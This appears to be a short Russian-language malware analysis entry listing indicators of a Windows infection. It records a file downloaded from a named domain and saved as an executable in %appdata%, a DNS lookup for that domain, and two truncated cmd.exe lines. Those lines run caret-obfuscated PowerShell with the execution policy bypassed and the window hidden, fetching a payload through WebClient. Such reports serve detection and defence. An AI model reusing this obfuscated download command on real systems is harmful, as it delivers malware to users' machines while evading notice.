Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^oW^e^rS^h^ELL.exe -EXeCU^t^i^OnpoLiCY ^bYPAs^S ^-noP^rOfI^l^E -wi^n^D^oWSt^YLe hId^DEN (nEw-obJECT s^yST^Em^.^NET.W^EbC^l^iEnt).^DoWNlOaDFiL^E(^'http://www.zonedopesa.to...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "p^oW^e^rS^h^ELL.exe -EXeCU^t^i^OnpoLiCY ^bYPAs^S ^-noP^rOfI^l^E -wi^n^D^oWSt^YLe hId^DEN (nEw-obJECT s^yST^Em^.^NET.W^EbC^l^iEnt).^DoWNlOaDFiL^E(^'http://www.zonedopesa.to...' (со скрытым окном)